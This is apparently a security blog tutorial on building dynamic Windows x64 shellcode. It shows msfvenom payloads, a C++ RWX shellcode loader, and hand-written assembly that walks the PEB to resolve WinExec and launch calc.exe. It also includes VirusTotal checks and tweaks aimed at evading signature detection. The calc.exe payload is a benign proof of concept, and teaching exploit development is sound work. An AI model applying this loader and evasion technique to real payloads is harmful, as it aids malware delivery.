aidenpearce369
Published on

Windows x64 - Dynamic Shellcoding (calc.exe)

Prologue

In the last blog we would have covered the essentials about the PEB and TEB process. And how we can use it to parse the loaded PE module from the process memory to fetch the required base addresses of the DLLs.

Now we will write a simple C++ program to spawn a calc.exe process,

#include "Windows.h"

int main()
{
	WinExec("calc.exe", 0);
	return 0;
}

When this program gets executed, it should pop us a calc.exe process from the WinExec Win API from the kernel32.dll.

WinExecCode

Creating the shellcode for the above program logic using msfvenom,

ubuntu-wsl@ra:~$ msfvenom --payload windows/x64/exec CMD=calc.exe -f c -b "\x00\x0a\x0d" -a x64 --platform windows
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 319 (iteration=0)
x64/xor chosen with final size 319
Payload size: 319 bytes
Final size of c file: 1369 bytes
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\x8e\x12\x12\x57\xf8\x56\x1f\xa3\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x72\x5a\x91"
"\xb3\x08\xbe\xdf\xa3\x8e\x12\x53\x06\xb9\x06\x4d\xf2\xd8"
"\x5a\x23\x85\x9d\x1e\x94\xf1\xee\x5a\x99\x05\xe0\x1e\x94"
"\xf1\xae\x5a\x99\x25\xa8\x1e\x10\x14\xc4\x58\x5f\x66\x31"
"\x1e\x2e\x63\x22\x2e\x73\x2b\xfa\x7a\x3f\xe2\x4f\xdb\x1f"
"\x16\xf9\x97\xfd\x4e\xdc\x53\x43\x1f\x73\x04\x3f\x28\xcc"
"\x2e\x5a\x56\x28\xdd\x9f\x2b\x8e\x12\x12\x1f\x7d\x96\x6b"
"\xc4\xc6\x13\xc2\x07\x73\x1e\x07\xe7\x05\x52\x32\x1e\xf9"
"\x86\xfc\xf5\xc6\xed\xdb\x16\x73\x62\x97\xeb\x8f\xc4\x5f"
"\x66\x31\x1e\x2e\x63\x22\x53\xd3\x9e\xf5\x17\x1e\x62\xb6"
"\xf2\x67\xa6\xb4\x55\x53\x87\x86\x57\x2b\x86\x8d\x8e\x47"
"\xe7\x05\x52\x36\x1e\xf9\x86\x79\xe2\x05\x1e\x5a\x13\x73"
"\x16\x03\xea\x8f\xc2\x53\xdc\xfc\xde\x57\xa2\x5e\x53\x4a"
"\x16\xa0\x08\x46\xf9\xcf\x4a\x53\x0e\xb9\x0c\x57\x20\x62"
"\x32\x53\x05\x07\xb6\x47\xe2\xd7\x48\x5a\xdc\xea\xbf\x48"
"\x5c\x71\xed\x4f\x1f\x42\x57\x1f\xa3\x8e\x12\x12\x57\xf8"
"\x1e\x92\x2e\x8f\x13\x12\x57\xb9\xec\x2e\x28\xe1\x95\xed"
"\x82\x43\xa6\xaa\x01\xd8\x53\xa8\xf1\x6d\xeb\x82\x5c\x5b"
"\x5a\x91\x93\xd0\x6a\x19\xdf\x84\x92\xe9\xb7\x8d\x53\xa4"
"\xe4\x9d\x60\x7d\x3d\xf8\x0f\x5e\x2a\x54\xed\xc7\x34\x99"
"\x3a\x7c\x8d\xeb\x6a\x77\x57\xf8\x56\x1f\xa3";

We have generated a shellcode of 319 bytes to spawn a calc.exe process. Here we haven't used any strong/custom encoders to increase the entropy of the shellcode for evasion. Incase, if we use some strong encoders like x86/shikata_ga_nai,x64/xor_dynamic it will increase the payload size too.

ubuntu-wsl@ra:~$ msfvenom --payload windows/x64/exec CMD=calc.exe -f c -b "\x00\x0a\x0d" -a x64 --platform windows -e x64/xor_dynamic -i 5
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 326 (iteration=0)
x64/xor_dynamic succeeded with size 376 (iteration=1)
x64/xor_dynamic succeeded with size 426 (iteration=2)
x64/xor_dynamic succeeded with size 476 (iteration=3)
x64/xor_dynamic succeeded with size 526 (iteration=4)
x64/xor_dynamic chosen with final size 526
Payload size: 526 bytes
Final size of c file: 2242 bytes
unsigned char buf[] =
"\xeb\x27\x5b\x53\x5f\xb0\x59\xfc\xae\x75\xfd\x57\x59\x53"
"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
"\xd1\x68\x74\x07\x80\x3e\x59\x75\xea\xeb\xe6\xff\xe1\xe8"
"\xd4\xff\xff\xff\x4c\x59\xa7\x6b\x17\x1f\x13\xfc\xa7\xb0"
"\xe2\x39\xb1\x1b\x15\x1f\x12\xc6\x4a\x7c\x4b\x04\xb3\x8b"
"\x04\xb3\x8a\x2a\xcd\x73\x97\x8e\x38\x4b\xcc\x72\xa7\x39"
"\xa6\xa7\xaa\xb3\xad\xa4\x98\xb3\xb3\xb3\x43\xa7\xa8\x64"
"\x18\x10\x1c\xf3\xe5\xbf\xed\x36\xbe\x14\x1a\x10\x1d\xc9"
"\x45\x73\x44\x0b\xbc\x84\x0b\xbc\x85\x25\xc2\x7c\xbd\xd0"
"\x37\x44\xc3\x7d\xe5\x36\xa9\xa8\xa5\xbc\xa2\xab\x97\xbc"
"\xbc\xbc\x67\xe5\x8c\x40\x3c\x34\x38\xd7\xf5\x9b\xc9\x12"
"\x9a\x30\x3e\x34\x39\xed\x61\x57\x60\x2f\x98\xa0\x2f\x98"
"\xa1\x01\xe6\x58\x66\x61\x13\x60\xe7\x59\xf5\x12\x8d\x8c"
"\x81\x98\x86\x8f\xb3\x98\x98\x98\x63\xf5\x88\x44\x38\x30"
"\x3c\xd3\xe6\x9f\xcd\x16\x9e\x34\x3a\x30\x3d\xe9\x65\x53"
"\x64\x2b\x9c\xa4\x2b\x9c\xa5\x05\xe2\x5c\x23\xa5\x17\x64"
"\xe3\x5d\xe6\x16\x89\x88\x85\x9c\x82\x8b\xb7\x9c\x9c\x9c"
"\x73\xe6\x8f\x3b\xf0\x97\x83\x9b\xb3\x73\x73\x73\x32\x22"
"\x32\x23\x21\x22\x25\x3b\x42\xa1\x16\x3b\xf8\x21\x13\x3b"
"\xf8\x21\x6b\x3b\xf8\x21\x53\x3b\xf8\x01\x23\x3b\x7c\xc4"
"\x39\x39\x3e\x42\xba\x3b\x42\xb3\xdf\x4f\x12\x0f\x71\x5f"
"\x53\x32\xb2\xba\x7e\x32\x72\xb2\x91\x9e\x21\x32\x22\x3b"
"\xf8\x21\x53\xf8\x31\x4f\x3b\x72\xa3\xf8\xf3\xfb\x73\x73"
"\x73\x3b\xf6\xb3\x07\x14\x3b\x72\xa3\x23\xf8\x3b\x6b\x37"
"\xf8\x33\x53\x3a\x72\xa3\x90\x25\x3b\x8c\xba\x32\xf8\x47"
"\xfb\x3b\x72\xa5\x3e\x42\xba\x3b\x42\xb3\xdf\x32\xb2\xba"
"\x7e\x32\x72\xb2\x4b\x93\x06\x82\x3f\x70\x3f\x57\x7b\x36"
"\x4a\xa2\x06\xab\x2b\x37\xf8\x33\x57\x3a\x72\xa3\x15\x32"
"\xf8\x7f\x3b\x37\xf8\x33\x6f\x3a\x72\xa3\x32\xf8\x77\xfb"
"\x3b\x72\xa3\x32\x2b\x32\x2b\x2d\x2a\x29\x32\x2b\x32\x2a"
"\x32\x29\x3b\xf0\x9f\x53\x32\x21\x8c\x93\x2b\x32\x2a\x29"
"\x3b\xf8\x61\x9a\x24\x8c\x8c\x8c\x2e\x3b\xc9\x72\x73\x73"
"\x73\x73\x73\x73\x73\x3b\xfe\xfe\x72\x72\x73\x73\x32\xc9"
"\x42\xf8\x1c\xf4\x8c\xa6\xc8\x83\xc6\xd1\x25\x32\xc9\xd5"
"\xe6\xce\xee\x8c\xa6\x3b\xf0\xb7\x5b\x4f\x75\x0f\x79\xf3"
"\x88\x93\x06\x76\xc8\x34\x60\x01\x1c\x19\x73\x2a\x32\xfa"
"\xa9\x8c\xa6\x10\x12\x1f\x10\x5d\x16\x0b\x16\x73\x23\xa5"
"\x66\x61\xbd\xd0\x97\x8e\xd1\x68";

Due to the usage of custom encoders to evade metasploit signature from shellcodes, it has increased the size of the shellcode size to 526 bytes

#include "Windows.h"
#include "stdio.h"

int main()
{
	unsigned char shellcode[] =
		"\xeb\x27\x5b\x53\x5f\xb0\x59\xfc\xae\x75\xfd\x57\x59\x53"
		"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
		"\xd1\x68\x74\x07\x80\x3e\x59\x75\xea\xeb\xe6\xff\xe1\xe8"
		"\xd4\xff\xff\xff\x4c\x59\xa7\x6b\x17\x1f\x13\xfc\xa7\xb0"
		"\xe2\x39\xb1\x1b\x15\x1f\x12\xc6\x4a\x7c\x4b\x04\xb3\x8b"
		"\x04\xb3\x8a\x2a\xcd\x73\x97\x8e\x38\x4b\xcc\x72\xa7\x39"
		"\xa6\xa7\xaa\xb3\xad\xa4\x98\xb3\xb3\xb3\x43\xa7\xa8\x64"
		"\x18\x10\x1c\xf3\xe5\xbf\xed\x36\xbe\x14\x1a\x10\x1d\xc9"
		"\x45\x73\x44\x0b\xbc\x84\x0b\xbc\x85\x25\xc2\x7c\xbd\xd0"
		"\x37\x44\xc3\x7d\xe5\x36\xa9\xa8\xa5\xbc\xa2\xab\x97\xbc"
		"\xbc\xbc\x67\xe5\x8c\x40\x3c\x34\x38\xd7\xf5\x9b\xc9\x12"
		"\x9a\x30\x3e\x34\x39\xed\x61\x57\x60\x2f\x98\xa0\x2f\x98"
		"\xa1\x01\xe6\x58\x66\x61\x13\x60\xe7\x59\xf5\x12\x8d\x8c"
		"\x81\x98\x86\x8f\xb3\x98\x98\x98\x63\xf5\x88\x44\x38\x30"
		"\x3c\xd3\xe6\x9f\xcd\x16\x9e\x34\x3a\x30\x3d\xe9\x65\x53"
		"\x64\x2b\x9c\xa4\x2b\x9c\xa5\x05\xe2\x5c\x23\xa5\x17\x64"
		"\xe3\x5d\xe6\x16\x89\x88\x85\x9c\x82\x8b\xb7\x9c\x9c\x9c"
		"\x73\xe6\x8f\x3b\xf0\x97\x83\x9b\xb3\x73\x73\x73\x32\x22"
		"\x32\x23\x21\x22\x25\x3b\x42\xa1\x16\x3b\xf8\x21\x13\x3b"
		"\xf8\x21\x6b\x3b\xf8\x21\x53\x3b\xf8\x01\x23\x3b\x7c\xc4"
		"\x39\x39\x3e\x42\xba\x3b\x42\xb3\xdf\x4f\x12\x0f\x71\x5f"
		"\x53\x32\xb2\xba\x7e\x32\x72\xb2\x91\x9e\x21\x32\x22\x3b"
		"\xf8\x21\x53\xf8\x31\x4f\x3b\x72\xa3\xf8\xf3\xfb\x73\x73"
		"\x73\x3b\xf6\xb3\x07\x14\x3b\x72\xa3\x23\xf8\x3b\x6b\x37"
		"\xf8\x33\x53\x3a\x72\xa3\x90\x25\x3b\x8c\xba\x32\xf8\x47"
		"\xfb\x3b\x72\xa5\x3e\x42\xba\x3b\x42\xb3\xdf\x32\xb2\xba"
		"\x7e\x32\x72\xb2\x4b\x93\x06\x82\x3f\x70\x3f\x57\x7b\x36"
		"\x4a\xa2\x06\xab\x2b\x37\xf8\x33\x57\x3a\x72\xa3\x15\x32"
		"\xf8\x7f\x3b\x37\xf8\x33\x6f\x3a\x72\xa3\x32\xf8\x77\xfb"
		"\x3b\x72\xa3\x32\x2b\x32\x2b\x2d\x2a\x29\x32\x2b\x32\x2a"
		"\x32\x29\x3b\xf0\x9f\x53\x32\x21\x8c\x93\x2b\x32\x2a\x29"
		"\x3b\xf8\x61\x9a\x24\x8c\x8c\x8c\x2e\x3b\xc9\x72\x73\x73"
		"\x73\x73\x73\x73\x73\x3b\xfe\xfe\x72\x72\x73\x73\x32\xc9"
		"\x42\xf8\x1c\xf4\x8c\xa6\xc8\x83\xc6\xd1\x25\x32\xc9\xd5"
		"\xe6\xce\xee\x8c\xa6\x3b\xf0\xb7\x5b\x4f\x75\x0f\x79\xf3"
		"\x88\x93\x06\x76\xc8\x34\x60\x01\x1c\x19\x73\x2a\x32\xfa"
		"\xa9\x8c\xa6\x10\x12\x1f\x10\x5d\x16\x0b\x16\x73\x23\xa5"
		"\x66\x61\xbd\xd0\x97\x8e\xd1\x68";

	void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (exec != 0) {
		memcpy(exec, shellcode, sizeof shellcode);
		((void(*)())exec)();
	}
	return 0;
}

Now by running this code along with our shellcode, it should spawn the calculator.

MetasploitShellcode

Let's create an executable with metasploit shellcode and analyze it with VirusTotal.

ubuntu-wsl@ra:~$ msfvenom --payload windows/x64/exec CMD=calc.exe -f exe -b "\x00\x0a\x0d" -a x64 --platform windows -o msfCalc.exe
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 319 (iteration=0)
x64/xor chosen with final size 319
Payload size: 319 bytes
Final size of exe file: 6656 bytes
Saved as: msfCalc.exe

MSFShellcodeVT

Link to msfCalc.exe sample

It is easy to generate and use these shellcodes. But at what cost? We can see that using these shellcodes in a real time OPSEC environments has no use and only gives us higher chances of getting detected. By using shellcodes generated from metasploit or other frameworks has higher chances of getting detected due to their signatures and it also consumes more memory due to its size and complexity. In this blog, we are going to learn how to craft a dynamic shellcode which gets executed in different machines of the same architecture.

Reaching the PE

The GS (General Segment) register is an x64 processor register that is used in protected mode, which is a mode of operation in x64 CPUs that provides memory protection and multitasking capabilities. The GS register plays a role in managing thread-local storage (TLS) and is used by the operating system and programming languages to efficiently access data that is specific to a particular thread or task.

To access the TEB directly using GS register we need to fetch the pointer with an offset of 0x30

Now let's start coding our shellcode from the assembly level.

section .text
    global main

main:

.findingDLL:
    mov rbx, qword ptr gs:[0x30];
    mov rbx, qword ptr [rbx+0x60];
    mov rbx, qword ptr [rbx+0x18];
    mov rbx, qword ptr [rbx+0x20];
    mov rbx, [rbx];
    mov rbx, [rbx];
    sub rbx, 0x10;
    mov rbx, qword ptr [rbx+0x30];
    mov r9,rbx;
  1. mov rbx, qword ptr gs:[0x30] - Accessing the pointer of TEB via the GS register.
  2. mov rbx, qword ptr [rbx+0x60] - Accessing the pointer of PEB from the TEB structure.
  3. mov rbx, qword ptr [rbx+0x18] - Getting the pointer of Ldr within the PEB structure.
  4. mov rbx, qword ptr [rbx+0x20] - Getting the pointer address of the parent process from InMemoryOrderModuleList which will also have the Flink for ntdll.dll.
  5. mov rbx, [rbx] - Getting the Flink of next loaded module ntdll.dll.
  6. mov rbx, [rbx] - Getting the Flink of next loaded module kernel32.dll.
  7. sub rbx, 0x10 - Accessing the _LDR_DATA_TABLE_ENTRY of the _LIST_ENTRY of kernel32.dll.
  8. mov rbx, qword ptr [rbx+0x30] - Fetching the base address of kernel32.dll.
  9. mov r9,rbx - Storing the base address of kernel32.dll.

NOTE : PEB can also be directly accessed via GS register at an offset of 0x60. This would help us remove one instruction from our code. I did't want to explain it in previous blog, since I wanted to show how PEB is inherited in TEB.

Now the modified assembly code becomes,

section .text
    global main

main:

.findingDLL:
    mov rbx, qword ptr gs:[0x60];
    mov rbx, qword ptr [rbx+0x18];
    mov rbx, qword ptr [rbx+0x20];
    mov rbx, [rbx];
    mov rbx, [rbx];
    mov rbx, qword ptr [rbx+0x20];
    mov r9,rbx;

Parsing the PE

For now we would have reached upto the base address of the kernel32.dll. Let's parse the loaded PE module to reach upto the Export Directory of the DLL to find our required functions.

.findingEAT:
    mov r9,rbx;
    mov rbx, dword ptr [rbx+0x3c]; 
    add rbx,r9;
    mov rbx, dword ptr [rbx+0x18];
    add rbx,r9;
    mov rbx, dword ptr [rbx+0x70];
    add rbx,r9;
    mov r8,rdx; 
  1. mov r9,rbx - Storing the address of kernel32.dll into another register.
  2. mov rbx, dword ptr [rbx+0x3c] - Finding the RVA of the PE header/PE signature.
  3. add rbx,r9 - Calculating the virtual address of PE header/PE signature.
  4. mov rbx, dword ptr [rbx+0x18] - Finding the RVA of the Optional NT header.
  5. add rbx,r9 - Calculating the virtual address of the Optional NT header.
  6. mov rbx, dword ptr [rbx+0x70] - Finding the RVA of the Export Directory.
  7. add rbx,r9 - Calculating the virtual address of the Export Directory.
  8. mov r8,rdx - Store the address of Export Directory.

Name Pointer Table and Ordinal Table

We have reached upto the Export Directory of the PE now. Let's parse the Export Directory to find the EAT, Name Pointer Table, Ordinal Table and find the RVA of the required functions.

Here we have a loop to find the position of the target function inside the Name Pointer table. Using that value we will be calculating the Ordinal Number.

    xor rbx,rbx;
    mov ebx, [rdx+0x20];
    add rbx, r9;
    mov rsi, rbx;

Here we are calculating the RVA of the Name Pointer table. Using the RVA we are calculating its virtual address and storing it in rsi register.

    mov rdx, 0x636578456e695741;
    shr rdx, 8;
    xor rcx, rcx;

Storing the string value of WinExec\0 in the stack using right shift operation. Using rcx as counter variable and initializing it to zero.

SearchFunction:
    inc rcx;
    xor rax,rax;
    mov eax, [rsi+(rcx*4)];
    add rax,r9;
    cmp qword [rax], rdx;
    jne SearchFunction

When the code execution comes into the loop, it starts incrementing the rcx register. It gets the RVA of the function name pointer from the Name Pointer table. And using that RVA, the virtual address of the function name pointer will be calculated. Further the address will be used to compare with the target function name stored in the stack. If it is equal the jne instruction will pass the code execution out of the loop. The value of the counter here will be Ordinal Number - 1, because we haven't incremented the rcx after matching the function name. This will make us reduce the instructions for calculating RVA in EAT.

The code for this section will be,

.findingFunction:
    xor rbx,rbx;
    mov ebx, [rdx+0x20];
    add rbx, r9;
    mov rsi, rbx;
    mov rdx, 0x636578456e695741;
    shr rdx, 8;
    xor rcx, rcx;

SearchFunction:
    inc rcx;
    xor rax,rax;
    mov eax, [rsi+(rcx*4)];
    add rax,r9;
    cmp qword [rax], rdx;
    jne SearchFunction

Function Address from EAT

.queryingEAT:
    xor rdx,rdx;
    mov dl, 4;
    imul rcx, rdx;
    xor rbx,rbx;
    mov ebx, [r8+0x1c];
    add rbx, r9;
    mov edx, [rbx+rcx]
    add rdx,r9;
    mov rdi,rdx;

We are performing a signed multiplication with the RCX == (Ordinal Number - 1) with the size of DWORD 4 bytes. Becuase each address pointer for the function increments by 4 bytes. Finding the RVA of the EAT from Export Directory and calculating its virtual address. Now finding the RVA for the target function address pointer by (EAT Virtual Address + (Counter Value)*4). We will get the virtual address of the target function by adding its RVA to the base address of the DLL.

Invoking Target Function

Since we are invoking the WinExec Win API, we need to know its structure.

UINT WinExec(
  [in] LPCSTR lpCmdLine,
  [in] UINT   uCmdShow
);

Loading UINT uCmdShow into RDX and storing calc.exe for LPCSTR lpCmdLine via stack pointer. Let's allocate some stack pointer, because the functions we invoke may use temporary variable in stack which may trouble our required data. After calling the function, restore the stack pointer and return to the code flow.

.callingWinExec:
    xor rdx, rdx;
    push rdx;
    push rdx;
	mov rcx, 0x6578652e636c6163;
    push rcx;
	mov rcx, rsp;
    sub rsp,0x50
	call rdi;		
	add rsp, 0x50;			
	ret;

Generating Shellcode

Now the shellcode for the whole logic will be,

section .text
    global main

main:

.findingDLL:
    mov rbx, [gs:0x60];
    mov rbx, [rbx+0x18];
    mov rbx, [rbx+0x20];
    mov rbx, [rbx];
    mov rbx, [rbx];
    mov rbx, [rbx+0x20];
    mov r9,rbx;

.findingEAT:
    xor rbx,rbx;
    xor rdx,rdx;
    mov bx, [r9+0x3c]; 
    add rbx,r9;
    mov edx, [rbx+0x88];
    add rdx,r9;
    mov r8,rdx; 


.findingFunction:
    xor rbx,rbx;
    mov ebx, [rdx+0x20];
    add rbx, r9;
    mov rsi, rbx;
    mov rdx, 0x636578456e695741;
    shr rdx, 8;
    xor rcx, rcx;

SearchFunction:
    inc rcx;
    xor rax,rax;
    mov eax, [rsi+(rcx*4)];
    add rax,r9;
    cmp qword [rax], rdx;
    jne SearchFunction

.queryingEAT:
    xor rdx,rdx;
    mov dl, 4;
    imul rcx, rdx;
    xor rbx,rbx;
    mov ebx, [r8+0x1c];
    add rbx, r9;
    mov edx, [rbx+rcx]
    add rdx,r9;
    mov rdi,rdx;

.callingWinExec:
    xor rdx, rdx;
    push rdx;
    push rdx;
	mov rcx, 0x6578652e636c6163;
    push rcx;
	mov rcx, rsp;
    sub rsp,0x50
	call rdi;		
	add rsp, 0x50;			
	ret;

Let's compile and extract shellcode from it.

(Linux)
ubuntu-wsl@ra:/mnt/e/Shellcoding$ nasm -f win64 shellcode.asm -o CalcShellcode.o

(Windows)
E:\Shellcoding>link /ENTRY:main /MACHINE:X64 /NODEFAULTLIB /SUBSYSTEM:CONSOLE CalcShellcode.o
Microsoft (R) Incremental Linker Version 14.00.24247.2
Copyright (C) Microsoft Corporation.  All rights reserved.

(Linux)
ubuntu-wsl@ra:/mnt/e/Shellcoding$ objdump -d CalcShellcode.exe >dump
ubuntu-wsl@ra:/mnt/e/Shellcoding$ ./extract dump

Odfhex - object dump shellcode extractor - by steve hanna - v.01
Trying to extract the hex of dump which is 2672 bytes long
"\x65\x48\x8b\x1c\x25\x60\x00\x00\x00\x48\x8b\x5b\x18\x48\x8b\x5b\x20"\
"\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd9\x48\x31\xdb\x48"\
"\x31\xd2\x66\x41\x8b\x59\x3c\x4c\x01\xcb\x8b\x93\x88\x00\x00\x00\x4c"\
"\x01\xca\x49\x89\xd0\x48\x31\xdb\x8b\x5a\x20\x4c\x01\xcb\x48\x89\xde"\
"\x48\xba\x41\x57\x69\x6e\x45\x78\x65\x63\x48\xc1\xea\x08\x48\x31\xc9"\
"\x48\xff\xc1\x48\x31\xc0\x8b\x04\x8e\x4c\x01\xc8\x48\x39\x10\x75\xef"\
"\x48\x31\xd2\xb2\x04\x48\x0f\xaf\xca\x48\x31\xdb\x41\x8b\x58\x1c\x4c"\
"\x01\xcb\x8b\x14\x0b\x4c\x01\xca\x48\x89\xd7\x48\x31\xd2\x52\x52\x48"\
"\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x89\xe1\x48\x83\xec\x50"\
"\xff\xd7\x48\x83\xc4\x50\xc3";

160 bytes extracted.

We still have some \x00 null bytes in our shellcode. Since it is for memory offsets, it shouldn't be a problem. Let's check our shellcode execution.

#include "Windows.h"

int main()
{
	unsigned char shellcode[] =
		"\x65\x48\x8b\x1c\x25\x60\x00\x00\x00\x48\x8b\x5b\x18\x48\x8b\x5b\x20"\
		"\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd9\x48\x31\xdb\x48"\
		"\x31\xd2\x66\x41\x8b\x59\x3c\x4c\x01\xcb\x8b\x93\x88\x00\x00\x00\x4c"\
		"\x01\xca\x49\x89\xd0\x48\x31\xdb\x8b\x5a\x20\x4c\x01\xcb\x48\x89\xde"\
		"\x48\xba\x41\x57\x69\x6e\x45\x78\x65\x63\x48\xc1\xea\x08\x48\x31\xc9"\
		"\x48\xff\xc1\x48\x31\xc0\x8b\x04\x8e\x4c\x01\xc8\x48\x39\x10\x75\xef"\
		"\x48\x31\xd2\xb2\x04\x48\x0f\xaf\xca\x48\x31\xdb\x41\x8b\x58\x1c\x4c"\
		"\x01\xcb\x8b\x14\x0b\x4c\x01\xca\x48\x89\xd7\x48\x31\xd2\x52\x52\x48"\
		"\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x89\xe1\x48\x83\xec\x50"\
		"\xff\xd7\x48\x83\xc4\x50\xc3";

	void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (exec != 0) {
		memcpy(exec, shellcode, sizeof shellcode);
		((void(*)())exec)();
	}
	return 0;
}

FirstShellcode

Our dynamic shellcode is working perfectly. Now let's check the sample in VirusTotal for detections.

Link to CalcShellcode.exe sample

VT-1

This link is for the executable we created from the assembly code.

Link to sample of executable with shellcode

VT-2

The shellcode executed within the wrapper C++ code gives more suspicion due to its API calls and other detection rules.

Removing null bytes via shifting operation,

> mov rbx, [gs:0x60];

< xor rbx,rbx;
< mov ebx,0x60414141;
< shr ebx,24;
< mov rbx, [gs:ebx];

> mov edx, [rbx+0x88];

< xor rcx,rcx;
< mov ecx,0x88414141;
< shr ecx,24;
< mov edx, [rbx+rcx];

But this also introduces new instructions and increases the shellcode size. When compared to automated frameworks like metasploit, creating shellcodes like these provides some gaurantee on evasion and the signature can be changed by altering the opcodes in it. The newly updated dynamic shellcode for popping calc.exe will be 176 bytes,

#include "Windows.h"

int main()
{
	unsigned char shellcode[] =
		"\x48\x31\xdb\xbb\x41\x41\x41\x60\xc1\xeb\x18\x65\x67\x48\x8b\x1b\x48"\
		"\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20"\
		"\x49\x89\xd9\x48\x31\xdb\x48\x31\xd2\x66\x41\x8b\x59\x3c\x4c\x01\xcb"\
		"\x48\x31\xc9\xb9\x41\x41\x41\x88\xc1\xe9\x18\x8b\x14\x0b\x4c\x01\xca"\
		"\x49\x89\xd0\x48\x31\xdb\x8b\x5a\x20\x4c\x01\xcb\x48\x89\xde\x48\xba"\
		"\x41\x57\x69\x6e\x45\x78\x65\x63\x48\xc1\xea\x08\x48\x31\xc9\x48\xff"\
		"\xc1\x48\x31\xc0\x8b\x04\x8e\x4c\x01\xc8\x48\x39\x10\x75\xef\x48\x31"\
		"\xd2\xb2\x04\x48\x0f\xaf\xca\x48\x31\xdb\x41\x8b\x58\x1c\x4c\x01\xcb"\
		"\x8b\x14\x0b\x4c\x01\xca\x48\x89\xd7\x48\x31\xd2\x52\x52\x48\xb9\x63"\
		"\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x89\xe1\x48\x83\xec\x50\xff\xd7"\
		"\x48\x83\xc4\x50\xc3";

	void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (exec != 0) {
		memcpy(exec, shellcode, sizeof shellcode);
		((void(*)())exec)();
	}
	return 0;
}

References

tophertimzen - Windows Shellcode

Windows x64 Shellcode Development